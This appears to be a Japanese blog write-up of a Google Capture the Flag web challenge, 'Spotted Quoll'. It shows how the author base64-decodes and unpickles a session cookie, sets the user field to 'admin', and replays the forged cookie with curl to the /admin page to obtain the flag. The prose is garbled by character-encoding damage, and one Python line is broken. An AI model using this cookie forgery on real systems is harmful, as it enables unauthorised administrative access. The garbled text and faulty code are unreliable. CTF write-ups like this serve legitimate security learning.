Google Capture the Flagã«å‚åŠ ã—ãŸ
https://capturetheflag.withgoogle.com/rulesã«å‚åŠ ã—ã¾ã—ãŸã€‚
ãƒãƒ¼ãƒ ã¯Route9ã€‚é †ä½ã¯147ä½ã§ã—ãŸã€‚(得点ã®ã‚ã‚‹ãƒãƒ¼ãƒ æ•°ãŒ911/登録ãƒãƒ¼ãƒ ã¯2395)
ã—ã‹ã—僕ã¯1å•ã—ã‹è§£ã‘ãšã€ã—ã‹ã‚‚Flagã®ã‚³ãƒŸãƒƒãƒˆã—ã¦ãªã„ã¨ã„ã†ãªã‚“ã¨ã‚‚æ‚”ã—ã„æ„Ÿã˜ã«ãƒ»ãƒ»ãƒ»ã€‚
åä¾›ã®ç›¸æ‰‹ã—ã¦ã‚‹ã¨æ™‚é–“ãŒè¶³ã‚Šãªã„ã‚“ã ï¼(言ã„訳)
Web 50points Spotted Quoll
サイトã®/adminã«ã‚¢ã‚¯ã‚»ã‚¹ã™ã‚‹å•é¡Œ
サイトã«ã‚¢ã‚¯ã‚»ã‚¹ã—ãŸæ™‚点ã§å¤‰ãªã‚¯ãƒƒã‚ーãŒã¤ã„ã¦ã¾ã—ãŸ
Cookie obsoletePickle=KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu
Base64デコードã™ã‚‹ã¨ä»¥ä¸‹ã®æ–‡å—列ã«
>>> import base64
>>> print base64.b64decode("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu")
(dp1
S'python'
p2
S'pickles'
p3
sS'subtle'
p4
S'hint'
p5
sS'user'
p6
Ns.python pickleã§æ¤œç´¢ã™ã‚‹ã¨pythonã®ãƒ©ã‚¤ãƒ–ラリãŒã²ã£ã‹ã‹ã‚Šã¾ã—ãŸã€‚オブジェクトã®ã‚·ãƒªã‚¢ãƒ©ã‚¤ã‚ºã‚’ã—ã¦ãれるもã®ã‚‰ã—ãã€Rubyã®Marshalã¿ãŸã„ãªã‚‚ã®ã‹ãªã¨ã€‚
å…ˆã»ã©ã®æ–‡å—列をpickleã§ãƒ‡ã‚·ãƒªã‚¢ãƒ©ã‚¤ã‚ºã—ã¾ã™ã€‚
(ã“ã®æ™‚pickleã‚’ãã®ã¾ã¾importã™ã‚‹ã¨ã€ã‚·ãƒªã‚¢ãƒ©ã‚¤ã‚ºæ™‚ã®æ•°å—ãŒ0ã‹ã‚‰å§‹ã¾ã£ã¦ã—ã¾ã„期待通りã«ã„ãã¾ã›ã‚“)
>>> import cPickle pickle
>>> pickle.loads(base64.b64decode("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu"))
{'python': 'pickles', 'subtle': 'hint', 'user': None}userã«å…¥ã‚Œã¦ãã ã•ã„ã¨è¨€ã‚ã‚“ã°ã‹ã‚Š(笑)。
ãªã®ã§userã«adminを入れã¦ã‚·ãƒªã‚¢ãƒ©ã‚¤ã‚ºã—ã€å®Ÿéš›ã«æŠ•ã’ãŸã¨ã“ã‚FlagãŒå–ã‚Œã¾ã—ãŸã€‚
>>> base64.b64encode(pickle.dumps(s))
'KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKUydhZG1pbicKcDcKcy4='
$ curl -k https://spotted-quoll.ctfcompetition.com/admin -H "Cookie:obsoletePickle=KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKUydhZG1pbicKcDcKcy4="
Your flag is CTF{but_wait,theres_more.if_you_call} ... but is there more(1)? or less(1)?
